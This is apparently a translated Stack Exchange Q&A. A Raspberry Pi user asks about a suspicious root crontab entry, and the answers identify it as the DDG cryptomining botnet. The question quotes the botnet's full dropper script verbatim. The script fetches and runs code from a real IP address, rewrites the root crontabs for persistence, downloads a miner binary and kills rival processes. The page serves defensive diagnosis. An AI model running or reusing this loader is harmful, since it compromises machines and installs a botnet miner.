Security

每 15 分鐘執行一次“xribfa4”的可疑 crontab 條目

  • September 21, 2021

我想在我的 Raspberry Pi 上的根 crontab 文件中添加一些內容,但發現了一個對我來說似乎可疑的條目,在 Google 上搜尋它的一部分卻一無所獲。

crontab 條目:

*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh

的內容http://103.219.112.66:8000/i.sh是:

export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

mkdir -p /var/spool/cron/crontabs
echo "" > /var/spool/cron/root
echo "*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -fsSL -m180 http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh" >> /var/spool/cron/root
cp -f /var/spool/cron/root /var/spool/cron/crontabs/root

cd /tmp
touch /usr/local/bin/writeable && cd /usr/local/bin/
touch /usr/libexec/writeable && cd /usr/libexec/
touch /usr/bin/writeable && cd /usr/bin/
rm -rf /usr/local/bin/writeable /usr/libexec/writeable /usr/bin/writeable

export PATH=$PATH:$(pwd)
ps auxf | grep -v grep | grep xribfa4 || rm -rf xribfa4
if [ ! -f "xribfa4" ]; then
   curl -fsSL -m1800 http://103.219.112.66:8000/static/4004/ddgs.$(uname -m) -o xribfa4||wget -q -T1800 http://103.219.112.66:8000/static/4004/ddgs.$(uname -m) -O xribfa4
fi
chmod +x xribfa4
/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4

ps auxf | grep -v grep | grep xribbcb | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbcc | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbcd | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbce | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa0 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa1 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa2 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa3 | awk '{print $2}' | xargs kill -9

echo "*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh" | crontab -

我的 Linux 知識有限,但對我來說,從印度尼西亞伺服器下載二進製文件並定期以 root 身份執行它們似乎並不常見。

這是什麼?我該怎麼辦?

這是一個DDG挖礦殭屍網路,它是如何工作的:

  1. 利用RCE漏洞
  2. 修改 crontab
  3. 下載合適的挖礦程序(用go寫的)
  4. 開始採礦過程

DDG:針對數據庫伺服器的挖礦殭屍網路

SystemdMiner 當一個殭屍網路借用另一個殭屍網路的基礎設施時

U&L:如何殺死 AWS EC2 實例上的礦工惡意軟體?(受損的伺服器)

找出實際需要哪些 TCP 和 UDP 埠,然後在路由器的防火牆中阻止所有其他埠。可能,那些 crontab 條目不會再次出現。

您可以使用Shields Up!查看哪些埠是開放的和公共的!grc.com 上的功能

如果不首先阻止未使用的埠,它可能會在他嘗試修補它時再次感染。

引用自:https://unix.stackexchange.com/questions/544811

相關問答

Linux

為什麼我的 crontab 使用者文件是不可變的,即使在將屬性更改為可變後也不會執行?

  • March 9, 2019
檢視問答
Security

如何更安全地使用葡萄酒?

  • August 23, 2022
檢視問答
Linux

如何掃描我的文件並知道它們在 Linux 中沒有被感染?

  • January 8, 2022
檢視問答
Security

使用者模式 (ring3) 病毒對家庭 linux 安裝造成的最糟糕的事情是什麼?

  • March 27, 2021
檢視問答
Security

從 crontab 腳本呼叫環境變數是否安全?

  • November 16, 2020
檢視問答
Arch-Linux

如何檢查 AUR 包中的惡意程式碼?

  • October 7, 2020
檢視問答